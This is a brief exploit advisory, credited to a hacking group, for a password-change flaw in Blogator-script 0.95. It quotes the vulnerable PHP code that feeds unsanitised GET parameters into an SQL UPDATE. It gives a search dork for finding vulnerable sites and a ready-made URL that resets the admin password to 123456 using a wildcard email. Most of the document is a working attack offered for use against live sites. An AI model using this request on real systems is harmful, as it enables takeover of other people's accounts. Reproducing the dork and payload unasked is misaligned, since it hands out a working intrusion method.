############################################################################## # # # ...:::::Blogator-script 0.95 Change User Password Vulnerbility ::::.... # ############################################################################## Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) ----------------------------------- dork: inurl:/_blogadata/ ----------------------------------- vuln code in /_blogadata/include/init_pass2.php: line 23: $id=$_GET['a']; line 24:$email=$_GET['b']; line 25: $mdp=$_GET['c']; ..... line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1"); so if we put user id for $id and put %(any) for user email($email) and $mdp=newpassword.....he he he :) ------------ vuln: http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=% example:(change admin pass to 123456) http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=% --------------------------------